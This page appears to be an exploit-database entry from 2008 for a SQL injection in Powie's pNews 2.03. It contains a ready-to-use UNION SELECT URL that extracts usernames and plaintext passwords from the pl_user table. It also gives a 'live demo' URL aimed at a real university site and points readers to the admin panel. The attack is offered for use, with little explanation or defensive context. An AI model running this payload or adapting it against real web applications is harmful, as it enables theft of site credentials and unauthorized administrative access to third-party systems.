[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

pNews 2.03 (newsid) Remote SQL Injection Vulnerability

Author
r45c4l
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3660
Category
web applications
Date add
11-09-2008
Platform
unsorted
======================================================
pNews 2.03 (newsid) Remote SQL Injection Vulnerability
======================================================


################################################################ 
# 
# Title: Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit

#
# Vendor:  http://www.powie.de

# 
#
###########################################################
#
# d0rk:n/a
#
###########################################################
 
     Exploit:-
	http://www.site.com/[script]/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*

     
     
     Live Demo: 
	http://www.uni-leipzig.de/fsrpowi/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*

     Admin panel is at http://site.com/script/admin/ 

     The password in in plain text :P	

###########################################################
#
#  Bug discovered : 12 Sep.2008
###########################################################




#  0day.today [2024-12-25]  #